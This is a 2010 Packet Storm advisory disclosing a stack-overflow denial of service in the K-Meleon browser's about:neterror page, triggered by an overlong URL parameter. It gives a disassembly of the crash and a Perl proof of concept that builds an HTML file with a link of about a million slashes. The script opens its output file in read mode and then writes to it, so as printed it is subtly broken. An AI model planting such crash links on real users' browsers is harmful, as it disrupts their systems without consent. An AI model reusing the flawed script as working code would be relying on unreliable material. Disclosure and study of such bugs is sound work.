K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

2010-08-06T00:00:00
ID PACKETSTORM:92470
Type packetstorm
Reporter Lostmon
Modified 2010-08-06T00:00:00

Description

                                        
                                            `############################################  
K-Meleon for windows about:neterror Stack Overflow DoS  
Vendor URL:http://kmeleon.sourceforge.net/  
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html  
Vendor notified:Yes exploit available: YES  
############################################  
  
K-Meleon is an extremely fast, customizable, lightweight web browser  
based on the Gecko layout engine developed by Mozilla which is also  
used by Firefox. K-Meleon is free, open source software released under  
the GNU General Public License and is designed specifically for  
Microsoft Windows (Win32) operating systems.  
  
K-Meleon is prone vulnerable to crashing with a very long URL...  
Internal web pages like about:neterror does not limit the amount of  
chars that a user put in 'c' 'd' params and them if we compose a  
malformed url the browser can be chash easy.This issue is exploitable  
via web links like <a href="very long url">click here</a> or via  
window.location.replace('very long url') or similar vectors.  
  
#################  
Versions Tested  
#################  
  
I have tested this issue in win xp sp3 and a windows 7 fully pached.  
  
Win XP sp3:  
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )  
K-Meleon 1.6.0a4 Vulnerables.(crashes)  
  
windows 7 Ultimate:  
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)  
K-Meleon 1.6.0a4 Vulnerables.(crashes)  
  
############  
References  
############  
  
Discovered: 29-07-2010  
vendor notify:31-07-2010  
Vendor Response:  
Vendor patch:  
  
########################  
ASM code stack overflow  
########################  
  
ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png  
  
CPU Disasm  
Address Hex dump Command  
0043CB3F CC INT3  
0043CB40 /$ 3D 00100000 CMP EAX,1000  
0043CB45 |. 73 0E JNB SHORT 0043CB55  
0043CB47 |. F7D8 NEG EAX  
0043CB49 |. 03C4 ADD EAX,ESP  
0043CB4B |. 83C0 04 ADD EAX,4  
0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX  
0043CB50 |. 94 XCHG EAX,ESP  
0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]  
0043CB53 |. 50 PUSH EAX  
0043CB54 |. C3 RETN  
0043CB55 |> 51 PUSH ECX  
0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1]  
0043CB5A |> 81E9 00100000 /SUB ECX,1000  
0043CB60 |. 2D 00100000 |SUB EAX,1000  
0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow  
0043CB67 |. 3D 00100000 |CMP EAX,1000  
0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A  
0043CB6E |. 2BC8 SUB ECX,EAX  
0043CB70 |. 8BC4 MOV EAX,ESP  
0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX  
0043CB74 |. 8BE1 MOV ESP,ECX  
0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]  
0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]  
0043CB7B |. 50 PUSH EAX  
0043CB7C \. C3 RETN  
0043CB7D CC INT3  
0043CB7E CC INT3  
  
  
  
  
################  
#Proof Of Concept  
################  
  
#######################################################################  
#!/usr/bin/perl  
# k-meleon Long "a href" Link DoS  
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com  
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS  
# generate the file open it with k-keleon click in the link and wait a seconds  
######################################################################  
  
$archivo = $ARGV[0];  
if(!defined($archivo))  
{  
  
print "Usage: $0 <archivo.html>\n";  
  
}  
  
$cabecera = "<html>" . "\n";  
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x  
1028135 . "\">click here if you can :)</a>" . "\n";  
$fin = "</html>";  
  
$datos = $cabecera . $payload . $fin;  
  
open(FILE, '<' . $archivo);  
print FILE $datos;  
close(FILE);  
  
exit;  
  
################## EOF ######################  
  
##############  
Related Links  
##############  
  
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251  
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474  
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776  
  
###################### €nd #############################  
  
Thnx to Phreak for support and let me undestanding the nature of this bug  
thnx to jajoni for test it in windows 7 X64 bits version.  
  
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`